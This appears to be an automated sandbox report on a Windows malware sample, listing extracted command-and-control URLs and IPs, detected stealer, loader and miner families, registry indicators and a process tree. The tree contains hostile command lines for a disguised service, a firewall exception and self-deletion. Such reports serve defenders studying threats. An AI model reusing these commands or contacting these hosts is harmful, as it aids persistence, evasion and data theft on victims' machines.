amadey | fe5491949cbc72f01081ed5cd5405c3598bf98ac3bea2341908aa9e9c5e9d9d1

Analysis

max time kernel
135s
max time network
173s
platform
windows10_x64
resource
win10-en-20211208
submitted
20-12-2021 18:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fe5491949cbc72f01081ed5cd5405c3598bf98ac3bea2341908aa9e9c5e9d9d1.exe
Size

335KB
MD5

6b24fa995e1454cedfd917c085b2420f
SHA1

775d4803ae5956301c3b39b39c50c674c4293fac
SHA256

fe5491949cbc72f01081ed5cd5405c3598bf98ac3bea2341908aa9e9c5e9d9d1
SHA512

a7fe19dd608879d270b1c2fa8d7075c8a20a55bbfa1fe533eab4d85c02b0dc28f0f6312d90b20bc7651bd402121080f49c24d4b3b9cc809ae407f5186cdc80b1

Malware Config

Extracted

Family

smokeloader

Version

2020

http://host-data-coin-11.com/

http://file-coin-host-12.com/

http://srtuiyhuali.at/

http://fufuiloirtu.com/

http://amogohuigotuli.at/

http://novohudosovu.com/

http://brutuilionust.com/

http://bubushkalioua.com/

http://dumuilistrati.at/

http://verboliatsiaeeees.com/

rc4.i32

Extracted

Family

tofsee

mubrikych.top

oxxyfix.xyz

Extracted

Family

redline

Botnet

86.107.197.138:38133

Extracted

Family

redline

Botnet

install

62.182.156.187:56323

Extracted

Family

amadey

Version

2.86

2.56.56.210/notAnoob/index.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Arkei
Arkei is an infostealer written in C++.
stealer arkei

Detect Neshta Payload 13 IoCs

Processes:

resource	yara_rule
C:\ProgramData\9543_1640014546_7860.exe	family_neshta
C:\ProgramData\9543_1640014546_7860.exe	family_neshta
C:\Windows\svchost.com	family_neshta
C:\Windows\svchost.com	family_neshta
C:\odt\OFFICE~1.EXE	family_neshta
C:\Windows\svchost.com	family_neshta
C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXE	family_neshta
C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE	family_neshta
C:\PROGRA~2\Google\Update\1336~1.71\GO664E~1.EXE	family_neshta
C:\PROGRA~2\Google\Update\1336~1.71\GOBD5D~1.EXE	family_neshta
C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~1.EXE	family_neshta
C:\PROGRA~2\MOZILL~1\UNINST~1.EXE	family_neshta
C:\PROGRA~2\Google\Update\DISABL~1.EXE	family_neshta

Modifies system executable filetype association 2 TTPs 1 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1042

Processes:

9543_1640014546_7860.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	9543_1640014546_7860.exe

Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
persistence spyware neshta
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 7 IoCs

Processes:

resource	yara_rule
behavioral1/memory/484-139-0x0000000000AA0000-0x0000000000C76000-memory.dmp	family_redline
behavioral1/memory/484-140-0x0000000000AA0000-0x0000000000C76000-memory.dmp	family_redline
behavioral1/memory/2828-193-0x0000000000419326-mapping.dmp	family_redline
behavioral1/memory/2828-190-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/404-212-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/404-213-0x000000000041932E-mapping.dmp	family_redline
behavioral1/memory/4972-233-0x0000000001330000-0x0000000001500000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil
suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil
suricata
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Arkei Stealer Payload 3 IoCs

stealer

Processes:

resource	yara_rule
behavioral1/memory/1656-207-0x00000000004F0000-0x000000000050C000-memory.dmp	family_arkei
behavioral1/memory/1656-208-0x0000000000400000-0x00000000004D6000-memory.dmp	family_arkei
behavioral1/memory/2420-306-0x0000000000A30000-0x0000000000D93000-memory.dmp	family_arkei

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

XMRig Miner Payload 1 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1604-364-0x000000000319259C-mapping.dmp	xmrig

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 22 IoCs

Processes:

779.exeAFD0.exeB85C.exeC1D3.exeAFD0.exeC927.exeCFB0.exeDB88.exeCFB0.exeDB88.exeED0E.exeaommonjs.exeF5C9.exe53B.exeB76.execounterstrike.exe124D.exeleakless.exe9543_1640014546_7860.execmd.exesvchost.comtkools.exe

pid	process
4624	779.exe
300	AFD0.exe
484	B85C.exe
1656	C1D3.exe
1872	AFD0.exe
2184	C927.exe
2504	CFB0.exe
3880	DB88.exe
2828	CFB0.exe
404	DB88.exe
2548	ED0E.exe
4256	aommonjs.exe
4972	F5C9.exe
968	53B.exe
2420	B76.exe
1940	counterstrike.exe
4644	124D.exe
1868	leakless.exe
4828	9543_1640014546_7860.exe
4624	cmd.exe
2772	svchost.com
2084	tkools.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

VMProtect packed file 2 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\ED0E.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\ED0E.exe	vmprotect

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

B76.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	B76.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	B76.exe

Deletes itself 1 IoCs

Processes:

pid process

3052
Loads dropped DLL 3 IoCs

Processes:

C1D3.exe

pid process

1656 C1D3.exe
1656 C1D3.exe
1656 C1D3.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3052

pid	process
1656	C1D3.exe
1656	C1D3.exe
1656	C1D3.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

explorer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

B76.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA B76.exe
Drops file in System32 directory 1 IoCs

Processes:

svchost.exe

description ioc process

File created C:\Windows\SysWOW64\config\systemprofile:.repos svchost.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

Processes:

B85C.exeED0E.exeF5C9.exeB76.exe

pid process

484 B85C.exe
2548 ED0E.exe
4972 F5C9.exe
2420 B76.exe
2420 B76.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	B76.exe

description	ioc	process
File created	C:\Windows\SysWOW64\config\systemprofile:.repos	svchost.exe

pid	process
484	B85C.exe
2548	ED0E.exe
4972	F5C9.exe
2420	B76.exe
2420	B76.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

fe5491949cbc72f01081ed5cd5405c3598bf98ac3bea2341908aa9e9c5e9d9d1.exeAFD0.exeCFB0.exeDB88.exeaommonjs.exe

description	pid	process	target process
PID 3828 set thread context of 3692	3828	fe5491949cbc72f01081ed5cd5405c3598bf98ac3bea2341908aa9e9c5e9d9d1.exe	fe5491949cbc72f01081ed5cd5405c3598bf98ac3bea2341908aa9e9c5e9d9d1.exe
PID 300 set thread context of 1872	300	AFD0.exe	AFD0.exe
PID 2504 set thread context of 2828	2504	CFB0.exe	CFB0.exe
PID 3880 set thread context of 404	3880	DB88.exe	DB88.exe
PID 4256 set thread context of 3248	4256	aommonjs.exe	svchost.exe

Drops file in Windows directory 3 IoCs

Processes:

9543_1640014546_7860.exesvchost.com

description	ioc	process
File opened for modification	C:\Windows\svchost.com	9543_1640014546_7860.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 9 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

fe5491949cbc72f01081ed5cd5405c3598bf98ac3bea2341908aa9e9c5e9d9d1.exe779.exeAFD0.exe

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	fe5491949cbc72f01081ed5cd5405c3598bf98ac3bea2341908aa9e9c5e9d9d1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	779.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AFD0.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	fe5491949cbc72f01081ed5cd5405c3598bf98ac3bea2341908aa9e9c5e9d9d1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	779.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	779.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AFD0.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AFD0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	fe5491949cbc72f01081ed5cd5405c3598bf98ac3bea2341908aa9e9c5e9d9d1.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

C1D3.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	C1D3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	C1D3.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1856 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

3256 timeout.exe
4820 timeout.exe

pid	process
1856	schtasks.exe

pid	process
3256	timeout.exe
4820	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description flow ioc

HTTP User-Agent header 133 Go-http-client/1.1
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

4640 taskkill.exe

description	flow	ioc
HTTP User-Agent header	133	Go-http-client/1.1

pid	process
4640	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

svchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Buses	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Control Panel\Buses\Config0 = 4cdd273ee8b9bb0724edb47d450dd49d084297dce82e72baa46d34fdc48d541daf41822987cd945d24edb47d470dd49d024195daf71261adc06d04fda6e22673bbc9154961cda56815de84487d38e1a4644490bdbd7b21e8965c0ccbf58d3c74bbc4103d29faa36e10de834c740db8f2054991cfdb2470dd9c6d5d8dc4a0662dd098470f35fca668249ec60b1b79bdf0012dd98bb07526ef945400c4c4e13b7e85c12b496da0f15d15d8854e7438eda85219f459a45d1731d0426efdc48d541ce4ad744a6bbfff02579fc27d440dd49d642df4893d58fd98a46d34fdc741461ee4ad743c35f4a77311db9a4c703bfaac501bf4bd844d14dda46d34fdc48d541de4ad743d04cd945d24edb47d440dd49d642df4bd844d14dda46d34fdc48d541de4ad743de1cc945d	svchost.exe

Modifies registry class 2 IoCs

Processes:

9543_1640014546_7860.execmd.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	9543_1640014546_7860.exe
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

fe5491949cbc72f01081ed5cd5405c3598bf98ac3bea2341908aa9e9c5e9d9d1.exe

pid	process
3692	fe5491949cbc72f01081ed5cd5405c3598bf98ac3bea2341908aa9e9c5e9d9d1.exe
3692	fe5491949cbc72f01081ed5cd5405c3598bf98ac3bea2341908aa9e9c5e9d9d1.exe
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

3052
Suspicious behavior: MapViewOfSection 7 IoCs

Processes:

fe5491949cbc72f01081ed5cd5405c3598bf98ac3bea2341908aa9e9c5e9d9d1.exe779.exeAFD0.exe

pid process

3692 fe5491949cbc72f01081ed5cd5405c3598bf98ac3bea2341908aa9e9c5e9d9d1.exe
4624 779.exe
3052
3052
3052
3052
1872 AFD0.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 1 IoCs

Processes:

chrome.exe

pid process

3960 chrome.exe

pid	process
3052

Suspicious use of AdjustPrivilegeToken 55 IoCs

Processes:

CFB0.exeDB88.exeB85C.exeDB88.exe124D.exeF5C9.exeCFB0.exe

description	pid	process
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeDebugPrivilege	2504	CFB0.exe
Token: SeDebugPrivilege	3880	DB88.exe
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeDebugPrivilege	484	B85C.exe
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeDebugPrivilege	404	DB88.exe
Token: SeDebugPrivilege	4644	124D.exe
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeDebugPrivilege	4972	F5C9.exe
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeDebugPrivilege	2828	CFB0.exe
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052

Suspicious use of FindShellTrayWindow 26 IoCs

Processes:

chrome.exe

pid	process
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe
3960	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

fe5491949cbc72f01081ed5cd5405c3598bf98ac3bea2341908aa9e9c5e9d9d1.exeAFD0.exeCFB0.exeDB88.exeC927.exe

description	pid	process	target process
PID 3828 wrote to memory of 3692	3828	fe5491949cbc72f01081ed5cd5405c3598bf98ac3bea2341908aa9e9c5e9d9d1.exe	fe5491949cbc72f01081ed5cd5405c3598bf98ac3bea2341908aa9e9c5e9d9d1.exe
PID 3828 wrote to memory of 3692	3828	fe5491949cbc72f01081ed5cd5405c3598bf98ac3bea2341908aa9e9c5e9d9d1.exe	fe5491949cbc72f01081ed5cd5405c3598bf98ac3bea2341908aa9e9c5e9d9d1.exe
PID 3828 wrote to memory of 3692	3828	fe5491949cbc72f01081ed5cd5405c3598bf98ac3bea2341908aa9e9c5e9d9d1.exe	fe5491949cbc72f01081ed5cd5405c3598bf98ac3bea2341908aa9e9c5e9d9d1.exe
PID 3828 wrote to memory of 3692	3828	fe5491949cbc72f01081ed5cd5405c3598bf98ac3bea2341908aa9e9c5e9d9d1.exe	fe5491949cbc72f01081ed5cd5405c3598bf98ac3bea2341908aa9e9c5e9d9d1.exe
PID 3828 wrote to memory of 3692	3828	fe5491949cbc72f01081ed5cd5405c3598bf98ac3bea2341908aa9e9c5e9d9d1.exe	fe5491949cbc72f01081ed5cd5405c3598bf98ac3bea2341908aa9e9c5e9d9d1.exe
PID 3828 wrote to memory of 3692	3828	fe5491949cbc72f01081ed5cd5405c3598bf98ac3bea2341908aa9e9c5e9d9d1.exe	fe5491949cbc72f01081ed5cd5405c3598bf98ac3bea2341908aa9e9c5e9d9d1.exe
PID 3052 wrote to memory of 4624	3052		779.exe
PID 3052 wrote to memory of 4624	3052		779.exe
PID 3052 wrote to memory of 4624	3052		779.exe
PID 3052 wrote to memory of 4424	3052		explorer.exe
PID 3052 wrote to memory of 4424	3052		explorer.exe
PID 3052 wrote to memory of 4424	3052		explorer.exe
PID 3052 wrote to memory of 4424	3052		explorer.exe
PID 3052 wrote to memory of 4720	3052		explorer.exe
PID 3052 wrote to memory of 4720	3052		explorer.exe
PID 3052 wrote to memory of 4720	3052		explorer.exe
PID 3052 wrote to memory of 300	3052		AFD0.exe
PID 3052 wrote to memory of 300	3052		AFD0.exe
PID 3052 wrote to memory of 300	3052		AFD0.exe
PID 3052 wrote to memory of 484	3052		B85C.exe
PID 3052 wrote to memory of 484	3052		B85C.exe
PID 3052 wrote to memory of 484	3052		B85C.exe
PID 3052 wrote to memory of 1656	3052		C1D3.exe
PID 3052 wrote to memory of 1656	3052		C1D3.exe
PID 3052 wrote to memory of 1656	3052		C1D3.exe
PID 300 wrote to memory of 1872	300	AFD0.exe	AFD0.exe
PID 300 wrote to memory of 1872	300	AFD0.exe	AFD0.exe
PID 300 wrote to memory of 1872	300	AFD0.exe	AFD0.exe
PID 300 wrote to memory of 1872	300	AFD0.exe	AFD0.exe
PID 300 wrote to memory of 1872	300	AFD0.exe	AFD0.exe
PID 300 wrote to memory of 1872	300	AFD0.exe	AFD0.exe
PID 3052 wrote to memory of 2184	3052		C927.exe
PID 3052 wrote to memory of 2184	3052		C927.exe
PID 3052 wrote to memory of 2184	3052		C927.exe
PID 3052 wrote to memory of 2504	3052		CFB0.exe
PID 3052 wrote to memory of 2504	3052		CFB0.exe
PID 3052 wrote to memory of 2504	3052		CFB0.exe
PID 2504 wrote to memory of 2828	2504	CFB0.exe	CFB0.exe
PID 2504 wrote to memory of 2828	2504	CFB0.exe	CFB0.exe
PID 2504 wrote to memory of 2828	2504	CFB0.exe	CFB0.exe
PID 3052 wrote to memory of 3880	3052		DB88.exe
PID 3052 wrote to memory of 3880	3052		DB88.exe
PID 3052 wrote to memory of 3880	3052		DB88.exe
PID 3880 wrote to memory of 404	3880	DB88.exe	DB88.exe
PID 3880 wrote to memory of 404	3880	DB88.exe	DB88.exe
PID 3880 wrote to memory of 404	3880	DB88.exe	DB88.exe
PID 2504 wrote to memory of 2828	2504	CFB0.exe	CFB0.exe
PID 2504 wrote to memory of 2828	2504	CFB0.exe	CFB0.exe
PID 2504 wrote to memory of 2828	2504	CFB0.exe	CFB0.exe
PID 2504 wrote to memory of 2828	2504	CFB0.exe	CFB0.exe
PID 2504 wrote to memory of 2828	2504	CFB0.exe	CFB0.exe
PID 2184 wrote to memory of 1300	2184	C927.exe	cmd.exe
PID 2184 wrote to memory of 1300	2184	C927.exe	cmd.exe
PID 2184 wrote to memory of 1300	2184	C927.exe	cmd.exe
PID 2184 wrote to memory of 4208	2184	C927.exe	cmd.exe
PID 2184 wrote to memory of 4208	2184	C927.exe	cmd.exe
PID 2184 wrote to memory of 4208	2184	C927.exe	cmd.exe
PID 2184 wrote to memory of 5100	2184	C927.exe	sc.exe
PID 2184 wrote to memory of 5100	2184	C927.exe	sc.exe
PID 2184 wrote to memory of 5100	2184	C927.exe	sc.exe
PID 3880 wrote to memory of 404	3880	DB88.exe	DB88.exe
PID 3880 wrote to memory of 404	3880	DB88.exe	DB88.exe
PID 3880 wrote to memory of 404	3880	DB88.exe	DB88.exe
PID 3880 wrote to memory of 404	3880	DB88.exe	DB88.exe

outlook_office_path 1 IoCs

Processes:

explorer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

outlook_win_path 1 IoCs

Processes:

explorer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

C:\Users\Admin\AppData\Local\Temp\fe5491949cbc72f01081ed5cd5405c3598bf98ac3bea2341908aa9e9c5e9d9d1.exe
"C:\Users\Admin\AppData\Local\Temp\fe5491949cbc72f01081ed5cd5405c3598bf98ac3bea2341908aa9e9c5e9d9d1.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3828

C:\Users\Admin\AppData\Local\Temp\fe5491949cbc72f01081ed5cd5405c3598bf98ac3bea2341908aa9e9c5e9d9d1.exe
"C:\Users\Admin\AppData\Local\Temp\fe5491949cbc72f01081ed5cd5405c3598bf98ac3bea2341908aa9e9c5e9d9d1.exe"
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3692

C:\Users\Admin\AppData\Local\Temp\779.exe
C:\Users\Admin\AppData\Local\Temp\779.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4624

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:4424

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4720

C:\Users\Admin\AppData\Local\Temp\AFD0.exe
C:\Users\Admin\AppData\Local\Temp\AFD0.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:300

C:\Users\Admin\AppData\Local\Temp\AFD0.exe
C:\Users\Admin\AppData\Local\Temp\AFD0.exe
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1872

C:\Users\Admin\AppData\Local\Temp\B85C.exe
C:\Users\Admin\AppData\Local\Temp\B85C.exe
1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:484

C:\Users\Admin\AppData\Local\Temp\C1D3.exe
C:\Users\Admin\AppData\Local\Temp\C1D3.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:1656

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\C1D3.exe" & exit
2⤵
PID:4196

C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c timeout /t 5 & del /f /q C:\Users\Admin\AppData\Local\Temp\C1D3.exe & exit
3⤵
PID:1920

C:\Windows\SysWOW64\timeout.exe
timeout /t 5
4⤵
- Delays execution with timeout.exe
PID:3256

C:\Users\Admin\AppData\Local\Temp\C927.exe
C:\Users\Admin\AppData\Local\Temp\C927.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2184

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\nkqxfcyb\
2⤵
PID:1300

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\aommonjs.exe" C:\Windows\SysWOW64\nkqxfcyb\
2⤵
PID:4208

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create nkqxfcyb binPath= "C:\Windows\SysWOW64\nkqxfcyb\aommonjs.exe /d\"C:\Users\Admin\AppData\Local\Temp\C927.exe\"" type= own start= auto DisplayName= "wifi support"
2⤵
PID:5100

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description nkqxfcyb "wifi internet conection"
2⤵
PID:4172

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start nkqxfcyb
2⤵
PID:4116

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
2⤵
PID:1048

C:\Users\Admin\AppData\Local\Temp\CFB0.exe
C:\Users\Admin\AppData\Local\Temp\CFB0.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2504

C:\Users\Admin\AppData\Local\Temp\CFB0.exe
C:\Users\Admin\AppData\Local\Temp\CFB0.exe
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2828

C:\Users\Admin\AppData\Local\Temp\DB88.exe
